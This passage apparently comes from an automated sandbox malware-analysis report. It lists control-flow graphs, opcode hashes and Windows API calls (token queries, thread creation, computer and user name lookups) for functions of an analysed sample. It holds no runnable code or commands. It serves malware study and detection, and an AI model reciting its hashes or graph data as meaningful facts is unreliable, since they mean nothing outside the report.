                                                                                                                                                                      control_flow_graph 79 bc8070-bc817e 81 bc813d-bc81a5 79->81 82 bc8180 79->82 93 bc81bd-bc81ca 81->93 94 bc81a7 81->94 83 bc815f 82->83 84 bc8184 82->84 83->81 86 bc8161 83->86 87 bc818c-bc8192 84->87 88 bc8186 CloseHandle 84->88 90 bc8163-bc8170 call bf7164 86->90 91 bc8194 87->91 92 bc8115-bc8118 87->92 88->87 90->88 104 bc8172 90->104 91->92 96 bc819a 91->96 97 bc8119-bc811a 92->97 98 bc80a7 92->98 107 bc81d0 93->107 108 bc80f3 93->108 100 bc813c 96->100 97->98 101 bc811c 97->101 100->84 102 bc820f 101->102 105 bc808e-bc8096 102->105 106 bc8215-bc821e 102->106 104->87 105->84 105->98 106->105 116 bc8224 106->116 117 bc81fe-bc8201 GetTokenInformation 107->117 118 bc80c3 107->118 109 bc808c 108->109 110 bc80f5 108->110 109->105 110->109 115 bc8077 110->115 121 bc81d7-bc81de call bf715c 115->121 116->121 122 bc8226 116->122 117->102 128 bc81b7 117->128 118->117 120 bc80c9 118->120 124 bc80ca-bc80d8 GetTokenInformation 120->124 130 bc81e3-bc81e6 121->130 122->121 125 bc8228-bc82ee call bc5d90 122->125 127 bc810f 124->127 146 bc830c-bc831e 125->146 147 bc82f0 125->147 133 bc812d 127->133 134 bc8111 127->134 128->102 132 bc81b9-bc81bb 128->132 130->124 142 bc8089 130->142 132->93 137 bc80a8 133->137 138 bc8133 133->138 134->133 140 bc8113 134->140 144 bc80aa-bc80ad 137->144 138->100 141 bc81ed-bc81f0 138->141 140->92 148 bc80da-bc80f1 141->148 149 bc81f6 141->149 142->124 145 bc808b 142->145 144->90 150 bc80b3-bc8203 144->150 145->109 151 bc8320 146->151 152 bc82a1-bc82ba call bc5d90 call bcec00 146->152 147->146 153 bc82f2 147->153 148->144 149->148 154 bc81fc 149->154 150->90 156 bc8209 150->156 159 bc82f7-bc82fc call bc5d90 151->159 160 bc8322 151->160 152->151 153->159 154->117 168 bc8302 159->168 169 bc8253-bc8265 call be1280 159->169 160->159 163 bc8324-bc8326 160->163 164 bc8328 163->164 173 bc82df-bc832b 164->173 174 bc8335 164->174 168->169 172 bc8308-bc830a 168->172 169->164 179 bc826b 169->179 172->146 173->174 180 bc832d-bc8331 173->180 176 bc826e-bc8285 174->176 181 bc829b-bc829d 176->181 182 bc8287 176->182 179->176 183 bc8239 179->183 180->174 181->152 184 bc824c 182->184 183->164 186 bc823f-bc8243 183->186 184->181 185 bc824e-bc8252 184->185 185->176 186->159 186->184
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                      • Instruction ID: d10e7642c13491591391a607212a14121f4cb09d39d5cd4f33b7b582a8df7eaf
                                                                                                                                                                      • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                      • Instruction Fuzzy Hash: A661643061CA859FC7658B288898F767BE0FB9A350F2802DEE447DB1A1CF349C49C352
                                                                                                                                                                      Function 00BC5910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 187 bc5910-bc5912 188 bc5915-bc5928 call bf9970 187->188 189 bc5950-bc5968 187->189 195 bc59b8 call be0df0 188->195 189->188 190 bc596a 189->190 192 bc592f 190->192 193 bc5970-bc597b 190->193 192->188 198 bc5931-bd072c 192->198 196 bc597d 193->196 197 bc59d4 193->197 207 bc59bd-bc59c2 call bc5d90 195->207 196->197 199 bc597f-bc5981 196->199 202 bc59d8-bc59de 197->202 203 bc593b-bc5a15 call be11a0 197->203 204 bd0806-bd0809 198->204 205 bd0732-bd0738 198->205 206 bc5983-bc5a38 199->206 219 bc5994-bc599c 202->219 220 bc59e0 202->220 217 bd079d-bd07a6 204->217 210 bd073e 205->210 211 bd0800 205->211 206->219 221 bc5a3e 206->221 222 bc59c7-bc59ce 207->222 210->211 218 bd0744-bd0774 210->218 211->204 216 bd06b3-bd06b7 211->216 216->217 228 bd06bd 216->228 229 bd07a8 217->229 230 bd0791-bd0793 217->230 237 bd077a-bd081c 218->237 238 bd06d5-bd06d9 218->238 226 bc599e-bc59f7 219->226 227 bc5a02 219->227 220->219 224 bc59e2-bc59ec 220->224 231 bc5a2c-bc5a34 221->231 232 bc5a1a-bc5a26 222->232 233 bc59d0 222->233 235 bc59ee-bc59ef 224->235 236 bc5a62-bc5a6e 224->236 226->227 227->193 228->217 240 bd06c3-bd07fe 228->240 229->230 243 bd07aa 229->243 241 bd07ca-bd07cc 230->241 242 bc59d9-bc59de call bf2190 231->242 232->231 234 bc59a1-bc59b5 call bc5e10 232->234 233->232 244 bc59d2 233->244 234->195 261 bc5a08-bc5a0b 234->261 235->206 248 bc59f1 235->248 246 bc5a75-bc5ab3 call be1280 236->246 247 bc5a70 236->247 237->217 252 bd06df 238->252 253 bd06db 238->253 240->211 242->219 242->220 243->241 244->242 274 bc5abb-bc5af2 246->274 275 bc5ab5 246->275 247->246 255 bc5a72 247->255 248->188 252->217 253->252 258 bd06dd 253->258 255->246 258->252 262 bdc0cc 258->262 261->219 266 bc5a0d 261->266 263 bdc0ce-bdc0d0 262->263 264 bdc0e8-bdc102 262->264 267 bdc0d2-bdc0df 263->267 264->267 269 bdc104 264->269 271 bc5991 266->271 272 bc5932 266->272 279 bdc0e7 267->279 269->267 269->279 271->272 278 bc5993 271->278 281 bc5af3 274->281 275->274 280 bc5ab7-bc5ab9 275->280 278->219 280->274 281->281
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction ID: dd3c3017631741dd657f256478daa4d22713a6495e26467cbae357b90c4dec88
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction Fuzzy Hash: C3F1283171CE888FC669A71E58417BAB7D2EB99310F5845DFE04BC7396DE34AC468382
                                                                                                                                                                      Function 00BC5B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 332 bc5b42-bc5b47 call bc5d90 334 bc5b4c-bc5b52 332->334 336 bc5b0d 334->336 337 bc5c42-bc5c62 call be1280 334->337 336->337 338 bc5b13 336->338 351 bc5c68 337->351 352 bc5c24 337->352 340 bc5c8f-bc5c96 338->340 342 bc5c98-bc5c9a 340->342 343 bc5c29 340->343 344 bc5c9c 342->344 345 bc5c2f-bc5c36 343->345 346 bc5cc2-bc5cc9 call bc52a0 343->346 356 bc5d0e-bc5d18 344->356 357 bc5bfa 344->357 345->346 350 bc5c3c 345->350 359 bc5c69 346->359 360 bc5ccb 346->360 350->332 353 bc5c14-bc5c19 352->353 354 bc5c26 352->354 364 bc5cc0 353->364 365 bc5c20-bc5c21 353->365 354->353 358 bc5c28 354->358 361 bc5d1a 356->361 362 bc5d54 356->362 357->356 363 bc5c00 357->363 358->343 367 bc5c6f 359->367 368 bc5b68-bc5d75 359->368 360->344 366 bc5ccd 360->366 369 bc5d4b-bc5d52 361->369 363->353 364->346 365->351 366->344 370 bc5ccf-bc5cdd 366->370 367->368 373 bc5c75 367->373 369->362 372 bc5d45-bc5d47 369->372 374 bc5cdf-bc5ce4 CreateThread 370->374 375 bc5d5f 372->375 376 bc5d49 372->376 373->340 377 bc5cea 374->377 378 bc5c01-bc5d41 374->378 381 bc5d65 375->381 376->369 376->375 377->378 379 bc5cf0-bc5cf6 377->379 378->369 389 bc5d43 378->389 379->365 382 bc5cff-bc5d01 379->382 381->381 383 bc5bb4 382->383 384 bc5d07 382->384 388 bc5cda-bc5cdd 383->388 384->383 387 bc5d0d 384->387 388->374 389->362
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction ID: 2a95d991b4bd4818479e6e5c7a16a56f7084959df7baaf662a91a9b06dd70008
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction Fuzzy Hash: E121813020CF458FDB7A9B1888D8F766AE1EB95311F6805EE9447CF1A2CA24FCC49356
                                                                                                                                                                      Function 00BC5B09 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 390 bc5b09-bc5b3b 394 bc5cff-bc5d01 390->394 395 bc5bb4-bc5ce4 CreateThread 394->395 396 bc5d07 394->396 400 bc5cea 395->400 401 bc5c01-bc5d41 395->401 396->395 397 bc5d0d 396->397 400->401 402 bc5cf0-bc5cf6 400->402 408 bc5d4b-bc5d52 401->408 409 bc5d43 401->409 402->394 404 bc5c20-bc5c68 402->404 410 bc5d54 408->410 411 bc5d45-bc5d47 408->411 409->410 412 bc5d5f 411->412 413 bc5d49 411->413 414 bc5d65 412->414 413->408 413->412 414->414
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: 764dac71daf23cbdd9b73d99e564b30844d7783afd698df9f358eca7b19f2369
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: 9B01807010DF468FDB755B248C98F7A6BD0EB54324F6501EEC487CA091DA647DC0A712
                                                                                                                                                                      Function 00BC5B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 415 bc5b87-bc5b99 CreateThread 418 bc5cff-bc5d01 415->418 419 bc5bb4-bc5ce4 CreateThread 418->419 420 bc5d07 418->420 424 bc5cea 419->424 425 bc5c01-bc5d41 419->425 420->419 421 bc5d0d 420->421 424->425 426 bc5cf0-bc5cf6 424->426 432 bc5d4b-bc5d52 425->432 433 bc5d43 425->433 426->418 428 bc5c20-bc5c68 426->428 434 bc5d54 432->434 435 bc5d45-bc5d47 432->435 433->434 436 bc5d5f 435->436 437 bc5d49 435->437 438 bc5d65 436->438 437->432 437->436 438->438
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: a1cc69f8efd9e57ae7cce392f80b878ad56df462b011fabf0666b3fa2720cbca
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: C5E0863061DB448FDB799F245D507197EE5EB88314F1502CEC44AD71D1CB692D458792
                                                                                                                                                                      Function 00BC599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 439 bc599b-bc599e 440 bc59f7 439->440 441 bc5a02 440->441 443 bc597d 441->443 444 bc59d4 441->444 443->444 445 bc597f-bc5981 443->445 446 bc59d8-bc59de 444->446 447 bc593b-bc5a15 call be11a0 444->447 448 bc5983-bc5a38 445->448 453 bc5994-bc599c 446->453 454 bc59e0 446->454 448->453 455 bc5a3e 448->455 453->441 458 bc599e 453->458 454->453 457 bc59e2-bc59ec 454->457 459 bc5a2c-bc5a34 455->459 460 bc59ee-bc59ef 457->460 461 bc5a62-bc5a6e 457->461 458->440 462 bc59d9-bc59de call bf2190 459->462 460->448 466 bc59f1 call bf9970 460->466 464 bc5a75-bc5ab3 call be1280 461->464 465 bc5a70 461->465 462->453 462->454 477 bc5abb-bc5af2 464->477 478 bc5ab5 464->478 465->464 468 bc5a72 465->468 475 bc59b8 call be0df0 466->475 468->464 482 bc59bd-bc59c2 call bc5d90 475->482 484 bc5af3 477->484 478->477 481 bc5ab7-bc5ab9 478->481 481->477 485 bc59c7-bc59ce 482->485 484->484 486 bc5a1a-bc5a26 485->486 487 bc59d0 485->487 486->459 488 bc59a1-bc59b5 call bc5e10 486->488 487->486 489 bc59d2 487->489 488->475 492 bc5a08-bc5a0b 488->492 489->462 492->453 493 bc5a0d 492->493 495 bc5991 493->495 496 bc5932 493->496 495->496 497 bc5993 495->497 497->453
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction ID: d7dee5c92030e0834bde97b73e5bd031707027c181f7cd8a254955d724dad8f2
                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction Fuzzy Hash: 2801D67151DE84CFD73A9B194485F7966D1F754320F2845DEA08EC7092C9F4BDC09742
                                                                                                                                                                      Function 00BC8090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 498 bc8090-bc8096 499 bc8184 498->499 500 bc818c-bc8192 499->500 501 bc8186 CloseHandle 499->501 502 bc8194 500->502 503 bc8115-bc8118 500->503 501->500 502->503 504 bc819a 502->504 505 bc8119-bc811a 503->505 506 bc80a7 503->506 507 bc813c 504->507 505->506 508 bc811c 505->508 507->499 509 bc820f 508->509 510 bc808e-bc8096 509->510 511 bc8215-bc821e 509->511 510->499 510->506 511->510 513 bc8224 511->513 514 bc8226 513->514 515 bc81d7-bc81e6 call bf715c 513->515 514->515 516 bc8228-bc82ee call bc5d90 514->516 524 bc8089 515->524 525 bc80ca-bc810f GetTokenInformation 515->525 529 bc830c-bc831e 516->529 530 bc82f0 516->530 524->525 528 bc808b 524->528 533 bc812d 525->533 534 bc8111 525->534 539 bc808c 528->539 531 bc8320 529->531 532 bc82a1-bc82ba call bc5d90 call bcec00 529->532 530->529 535 bc82f2 530->535 541 bc82f7-bc82fc call bc5d90 531->541 542 bc8322 531->542 532->531 536 bc80a8 533->536 537 bc8133 533->537 534->533 540 bc8113 534->540 535->541 545 bc80aa-bc80ad 536->545 537->507 543 bc81ed-bc81f0 537->543 539->510 540->503 555 bc8302 541->555 556 bc8253-bc8265 call be1280 541->556 542->541 547 bc8324-bc8326 542->547 550 bc80da-bc80f1 543->550 551 bc81f6 543->551 552 bc8163-bc8170 call bf7164 545->552 553 bc80b3-bc8203 545->553 548 bc8328 547->548 566 bc82df-bc832b 548->566 567 bc8335 548->567 550->545 551->550 560 bc81fc 551->560 552->501 572 bc8172 552->572 553->552 563 bc8209 553->563 555->556 562 bc8308-bc830a 555->562 556->548 576 bc826b 556->576 569 bc81fe-bc8201 GetTokenInformation 560->569 562->529 566->567 577 bc832d-bc8331 566->577 571 bc826e-bc8285 567->571 569->509 582 bc81b7 569->582 578 bc829b-bc829d 571->578 579 bc8287 571->579 572->500 576->571 581 bc8239 576->581 577->567 578->532 583 bc824c 579->583 581->548 586 bc823f-bc8243 581->586 582->509 585 bc81b9-bc81ca 582->585 583->578 584 bc824e-bc8252 583->584 584->571 589 bc81d0 585->589 590 bc80f3 585->590 586->541 586->583 589->569 596 bc80c3 589->596 590->539 591 bc80f5 590->591 591->539 595 bc8077 591->595 595->515 596->569 597 bc80c9 596->597 597->525
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction ID: dc78a101fe4cd9feb4470f49f5d3ddc84b25e900c9977dcac8a6d3bd4f5a0314
                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction Fuzzy Hash: 80C08C7013880296573A0A482C0BFB126C0C20E390B0E04CE8C02A0220DD288E4300A7
                                                                                                                                                                      Function 00BC817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 598 bc817f 599 bc8184 598->599 600 bc818c-bc8192 599->600 601 bc8186 CloseHandle 599->601 602 bc8194 600->602 603 bc8115-bc8118 600->603 601->600 602->603 604 bc819a 602->604 605 bc8119-bc811a 603->605 606 bc80a7 603->606 607 bc813c 604->607 605->606 608 bc811c 605->608 607->599 609 bc820f 608->609 610 bc808e-bc8096 609->610 611 bc8215-bc821e 609->611 610->599 610->606 611->610 613 bc8224 611->613 614 bc8226 613->614 615 bc81d7-bc81e6 call bf715c 613->615 614->615 616 bc8228-bc82ee call bc5d90 614->616 624 bc8089 615->624 625 bc80ca-bc810f GetTokenInformation 615->625 629 bc830c-bc831e 616->629 630 bc82f0 616->630 624->625 628 bc808b 624->628 633 bc812d 625->633 634 bc8111 625->634 639 bc808c 628->639 631 bc8320 629->631 632 bc82a1-bc82ba call bc5d90 call bcec00 629->632 630->629 635 bc82f2 630->635 641 bc82f7-bc82fc call bc5d90 631->641 642 bc8322 631->642 632->631 636 bc80a8 633->636 637 bc8133 633->637 634->633 640 bc8113 634->640 635->641 645 bc80aa-bc80ad 636->645 637->607 643 bc81ed-bc81f0 637->643 639->610 640->603 655 bc8302 641->655 656 bc8253-bc8265 call be1280 641->656 642->641 647 bc8324-bc8326 642->647 650 bc80da-bc80f1 643->650 651 bc81f6 643->651 652 bc8163-bc8170 call bf7164 645->652 653 bc80b3-bc8203 645->653 648 bc8328 647->648 666 bc82df-bc832b 648->666 667 bc8335 648->667 650->645 651->650 660 bc81fc 651->660 652->601 672 bc8172 652->672 653->652 663 bc8209 653->663 655->656 662 bc8308-bc830a 655->662 656->648 676 bc826b 656->676 669 bc81fe-bc8201 GetTokenInformation 660->669 662->629 666->667 677 bc832d-bc8331 666->677 671 bc826e-bc8285 667->671 669->609 682 bc81b7 669->682 678 bc829b-bc829d 671->678 679 bc8287 671->679 672->600 676->671 681 bc8239 676->681 677->667 678->632 683 bc824c 679->683 681->648 686 bc823f-bc8243 681->686 682->609 685 bc81b9-bc81ca 682->685 683->678 684 bc824e-bc8252 683->684 684->671 689 bc81d0 685->689 690 bc80f3 685->690 686->641 686->683 689->669 696 bc80c3 689->696 690->639 691 bc80f5 690->691 691->639 695 bc8077 691->695 695->615 696->669 697 bc80c9 696->697 697->625
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction ID: e6c7f18aca96b79a919b6707949ccb2e6951efd0498291b024f145593229dddd
                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: 09C092B05A850987563A2A882C0AEB235D4C61F7A0F0E58DEED16BA361DD684D8341B2

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00B752A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 282 b752a0-b753fe 287 bb0d4c-bb0d4e 282->287 288 b75400-b75424 282->288 290 b7539b 288->290 291 b7542a 288->291 293 b75413-b75419 290->293 294 b7539d-b753a1 290->294 291->290 292 b75430-b7543e 291->292 297 b75441-b7544a 292->297 295 b753a7 294->295 296 b752b0-b752b5 294->296 295->296 298 b753ad 295->298 303 b753c4-b753ca GetSystemDefaultLangID 297->303 304 b75450 297->304 299 b753f3-b753f9 298->299 300 b753af 298->300 310 b75355 299->310 311 b7532a 299->311 302 b753e0-b753f1 300->302 302->293 302->299 305 b75475-b7547b 303->305 312 b75411 304->312 313 b753c1 304->313 305->287 317 b752d1-b752e7 310->317 318 b752e8-b75363 310->318 311->310 314 b7532c-b7533f 311->314 312->293 312->303 313->312 316 b753c3 313->316 319 b7536b-b7536f 314->319 317->318 323 b75365 318->323 324 b753d1-b753d5 318->324 319->297 322 b75375-b75390 319->322 322->316 328 b75392-b7539a 322->328 323->324 327 b75367-b75369 323->327 324->294 326 b753d7 324->326 326->302 329 b75342-b75345 326->329 327->319 328->294 329->288 330 b7534b 329->330 330->288 331 b75351-b75353 330->331 331->310
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 00B753C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_33_2_b70000_vds.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction ID: ec068ce22cfa21bce38de050bb5f932b5818358cad611dedae57f049abad7fd5
                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction Fuzzy Hash: E641C5A180DE958FD736432448A42747BE0DB113E2F9EC5D6D4FF8A1F6E2D84C81936A
                                                                                                                                                                      Function 00B90080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 b90080-b90286 2 b90099-b90575 0->2 3 b9028c 0->3 7 b9057b 2->7 8 b90155 2->8 4 b90445 3->4 4->2 6 b9044b-b90457 4->6 10 b90458-b90472 GetComputerNameW 6->10 7->8 11 b90581-b90587 7->11 9 b902ef-b90495 call b7e050 * 2 8->9 9->10 52 b9043e 9->52 15 b9024c-b90253 10->15 16 b903ee-b903f4 10->16 13 b9058b 11->13 18 b9058c-b90591 13->18 19 b90181 VirtualFree 13->19 20 b90255 15->20 21 b901e6 15->21 40 b900da-b9023f 16->40 41 b903fa 16->41 24 b904ab-b904af 18->24 25 b90597 18->25 23 b901a8-b902ac call ba7164 19->23 26 b902d3 20->26 29 b901ec-b90313 call ba715c 21->29 30 b902b1-b902be 21->30 23->30 49 b904c7 24->49 25->24 32 b9059d 25->32 26->21 39 b902d9 26->39 55 b90318-b9031e 29->55 36 b903bf-b903d9 GetUserNameW 30->36 37 b902c4 30->37 32->24 44 b90331 36->44 37->36 45 b902ca 37->45 39->9 40->15 53 b90241-b9024a 40->53 41->40 46 b90400 41->46 50 b90171 44->50 51 b90337 44->51 45->26 54 b9b1ee-b9b49f 46->54 58 b904cc-b904e6 call ba9970 GetComputerNameW 49->58 59 b9013f-b90146 50->59 60 b90173 50->60 51->50 61 b9033d 51->61 52->4 53->15 53->30 56 b90568-b9056b 55->56 57 b90324 55->57 56->58 57->56 62 b9032a 57->62 69 b904ec-b90514 58->69 70 b90131 58->70 59->13 64 b90230 60->64 65 b905d0-b905d9 61->65 62->44 64->49 68 b90236-b905c2 64->68 65->54 68->49 72 b905c8-b905c9 68->72 69->56 73 b90089-b9008c 70->73 74 b90137 70->74 72->65 73->23 77 b90092 73->77 74->73 75 b9013d 74->75 75->19 75->59 77->23 78 b90098 77->78 78->2
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000021.00000002.2624588607.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_33_2_b70000_vds.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                      • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                      • Instruction ID: 2d91b10aa35703d2cac745044183ead5c0a82ce2fe72fe3cc192b67e27df37d5
                                                                                                                                                                      • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                      • Instruction Fuzzy Hash: 07D1063152CB0D8FCB28FF58D8857EAB7E1FBA0310F5846AED846C3265DA74964586C2
                                                                                                                                                                      Function 00B78070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
